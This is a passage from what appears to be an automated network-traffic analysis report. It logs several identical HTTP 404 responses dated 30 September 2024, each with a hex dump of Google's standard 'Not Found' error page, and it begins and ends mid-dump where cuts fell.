70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:26 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:28 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:29 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:31 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:32 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:33 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 